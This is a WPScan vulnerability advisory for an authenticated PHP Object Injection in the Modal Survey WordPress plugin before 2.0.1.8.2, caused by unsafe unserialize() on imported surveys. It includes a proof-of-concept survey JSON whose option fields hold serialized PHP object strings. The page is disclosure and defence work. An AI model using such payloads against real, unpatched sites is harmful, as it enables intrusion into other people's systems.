WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection

Description

The Unserialize() function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability

Proof of Concept

{
   "name":"Open Text Answer Sample",
   "id":"924478511",
   "options":"[]",
   "global":"0",
   "start_time":"0000-00-00 00:00:00",
   "expiry_time":"0000-00-00 00:00:00",
   "export_time":"2020-12-21 01:08",
   "questions":{
      "1":{
         "name":"How fast is our support? [-]",
         "count":0,
         "qoptions":"O:21:\"Object_Injection_func\":0:{}",
         "1":{
            "answer":"Very slow [Speed]",
            "count":"0",
            "aoptions":"O:21:\"Object_Injection_func\":0:{}",
            "percentage":"0",
            "uniqueid":"2646920000000"
         }
      }
   }
}

Affects Plugins

modal_survey
Fixed in version 2.0.1.8.2

References

URL
http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type

OBJECT INJECTION

OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502

Miscellaneous

Original Researcher

Pagely

Submitter

John Castro

Submitter website
https://pagely.com/
Submitter twitter
pagely
Verified

Yes

WPVDB ID
05dbd5a0-af45-40fa-a027-fc8f9dd9a706

Timeline

Publicly Published

2021-01-08 (about 2 years ago)

Added

2021-01-08 (about 2 years ago)

Last Updated

2021-01-10 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin